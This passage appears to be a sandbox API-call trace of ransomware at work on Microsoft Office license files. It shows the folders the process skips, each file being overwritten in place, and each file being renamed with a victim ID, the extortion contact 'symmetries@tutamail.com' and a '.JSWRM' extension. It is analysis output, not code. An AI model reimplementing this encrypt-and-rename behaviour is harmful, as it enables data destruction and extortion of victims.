dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.934] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20852) returned 1 [0107.934] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0107.934] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0107.937] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.937] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0107.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.937] CloseHandle (hObject=0x45c) returned 1 [0107.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0107.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0107.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0107.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0107.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0107.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0107.939] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe921e1c5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe921e1c5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe939b949, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PRA246~1.XRM")) returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.939] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0107.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0107.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0107.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0107.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0107.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.940] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11604) returned 1 [0107.940] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.940] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.942] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.942] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.943] CloseHandle (hObject=0x45c) returned 1 [0107.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0107.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0107.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0107.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.943] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0107.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.944] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe91f7f63, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe91f7f63, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe934f47c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ded, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PR6ACE~1.XRM")) returned 1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.944] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.945] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.945] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.945] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0107.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0107.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0107.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.946] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19949) returned 1 [0107.946] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0107.946] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0107.950] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.950] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0107.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.950] CloseHandle (hObject=0x45c) returned 1 [0107.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0107.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0107.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0107.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0107.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0107.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.951] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0107.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.955] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe969686e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe969686e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9a50348, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail-pl.xrm-ms", cAlternateFileName="PR7342~1.XRM")) returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.956] lstrcmpiW (lpString1="ProjectProR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0107.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0107.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0107.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241038, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0107.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0107.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 